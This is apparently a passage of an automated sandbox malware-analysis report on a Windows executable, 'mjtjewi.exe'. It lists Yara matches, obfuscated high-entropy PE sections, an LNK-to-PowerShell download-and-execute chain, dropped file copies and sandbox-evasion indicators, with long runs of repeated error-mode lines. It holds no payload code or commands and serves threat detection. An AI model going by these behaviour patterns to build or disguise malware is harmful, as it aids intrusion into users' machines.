Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mjtjewi.exe PID: 876, type: MEMORYSTR

PE file contains sections with non-standard names

Source: mjtjewi.exe.0.dr	Static PE information: section name: j1CM!e^U
Source: mjtjewi.exe.0.dr	Static PE information: section name:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFE7DE700BD pushad ; iretd	0_2_00007FFE7DE700C1
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_00BB81B8 pushfd ; ret	4_2_00BB81BF
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_00BB79E2 push esp; retf	4_2_00BB79E8
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01521503 push ss; retf	4_2_01521504
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 4_2_01521522 push ebp; retf	4_2_01521523
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_00402AC0 push eax; ret	6_2_00402AD4
Source: C:\Users\user\Desktop\mjtjewi.exe	Code function: 6_2_00402AC0 push eax; ret	6_2_00402AFC

Source: mjtjewi.exe.0.dr

Static PE information: section name: j1CM!e^U entropy: 7.999315698306394

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Tries to download and execute files (via powershell)

Source: unknown

Drops PE files

Source: C:\Users\user\Desktop\mjtjewi.exe	File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Desktop\mjtjewi.exe			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 2F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 4F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 5550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 6550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 6680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 7680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 7A10000 memory reserve \| memory write watch	Jump to behavior
